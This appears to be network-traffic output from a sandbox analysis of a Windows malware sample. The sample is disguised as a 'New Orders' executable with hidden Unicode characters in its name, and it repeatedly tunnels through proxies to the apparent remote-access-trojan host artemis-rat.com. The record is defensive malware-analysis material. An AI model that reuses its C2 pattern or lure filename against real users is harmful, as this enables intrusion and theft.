                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 5
                                                                                        X-Squid-Error: TCP_RESET 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from proxy.wakoopa.com
                                                                                        Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 72 65 73 65 74
                                                                                        Data Ascii: reset


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1512192.168.2.954323139.224.64.19180817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.389060020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.717287064 CET767INHTTP/1.1 403 Forbidden
                                                                                        Server: Beaver
                                                                                        Cache-Control: no-cache
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 635
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                        Mar 11, 2024 16:16:46.718417883 CET716INHTTP/1.1 405 Not Allowed
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 559
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.18.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1513192.168.2.95391245.125.222.97472397672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.389555931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1514192.168.2.95435918.133.16.21807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.400182009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.700227022 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:46.729702950 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 5e e0 96 1e 7d 9b f8 1e c4 b2 28 37 63 e4 f4 f2 da 86 8d 00 76 93 e4 fd 74 92 6b b6 04 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e ^}(7cvtk*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:47.039292097 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 e5 8b 4a 75 32 8e aa bf 45 d2 e8 86 eb 85 87 99 3e c9 36 18 bc e6 2e 85 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =9Ju2E>6.DOWNGRD0000*H010Uartemis-rat.com0240311142236Z260311142236Z010Uartemis-rat.com0"0*H09RK
                                                                                        Mar 11, 2024 16:16:47.427880049 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 c5 ea 8b 49 09 46 b5 2e 28 02 15 8f b5 ce b5 22 8c 86 46 1b 06 20 da 17 22 90 2e 12 5a 3f 70 7e 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 ba 1c 31 e7 1d 20 30 03 10 11 cb 01 73 8b f4 db a2 da 9f 51 cb
                                                                                        Data Ascii: %! IF.("F ".Z?p~(1 0sQ#e>?(
                                                                                        Mar 11, 2024 16:16:47.721049070 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 dd a1 bf 31 6e 77 7b f0 db 4a 8f 6b 88 6f 26 c1 e0 31 60 43 e3 c7 35 fd 15 05 62 95 cc 97 39 c2 2a 24 09 a1 eb cb 98 a2
                                                                                        Data Ascii: (1nw{Jko&1`C5b9*$


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1515192.168.2.95437118.135.133.116807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.407063007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.702908993 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:46.729960918 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 5e d2 18 2d cf 0c 7c 28 e3 88 59 0d 71 c3 78 9f 6c fd 63 15 c7 8f 20 d9 53 2f e2 0f 16 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e ^-|(Yqxlc S/*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:47.037580013 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 98 38 0b 36 13 de 5c a6 db 92 d9 ee 24 16 27 1b 15 66 df 55 e5 02 20 55 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =986\$'fU UDOWNGRD0000*H010Uartemis-rat.com0240311142236Z260311142236Z010Uartemis-rat.com0"0*H09RK
                                                                                        Mar 11, 2024 16:16:47.425911903 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 82 a6 7f d5 ce 3d 9c 93 6f f3 ef b6 c6 b2 e7 e4 b0 48 62 9d e0 10 66 1f e9 c4 e1 59 0e d3 69 53 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 5d e2 0a 61 7d 7a 53 6e 81 55 73 76 4d 60 8c d4 7b b3 ab 4d c7
                                                                                        Data Ascii: %! =oHbfYiS(]a}zSnUsvM`{MNp[
                                                                                        Mar 11, 2024 16:16:47.719108105 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 5d 5c d2 69 43 cc 0c 6b 4f b8 ca 8b bc 33 e1 a1 63 31 14 54 41 12 16 e7 49 1b 60 4f 6e 6e c5 50 c7 fb 64 aa fd 20 8a 48
                                                                                        Data Ascii: (]\iCkO3c1TAI`OnnPd H


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1516192.168.2.949747200.174.198.9588887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.409337044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.467756987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.570238113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.570204973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.569947004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:22.573484898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:34.571953058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:58.571887016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:46.665494919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1517192.168.2.954364178.62.229.2831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.410795927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.221745968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.148763895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.009649038 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1518192.168.2.954420104.25.108.120807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.410876036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.565849066 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1519192.168.2.954429185.238.228.96807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.413363934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.568109989 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1520192.168.2.954407162.159.243.178807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.413961887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.575375080 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1521192.168.2.95436518.185.169.15031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.414196968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.716955900 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1522192.168.2.952579148.72.212.252335167672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.415117979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.417454958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.445445061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.445252895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.444998980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:22.445395947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1523192.168.2.954355122.3.255.11441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.415802956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1524192.168.2.954342216.9.224.113807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.424829006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.762346983 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0 (Ubuntu)
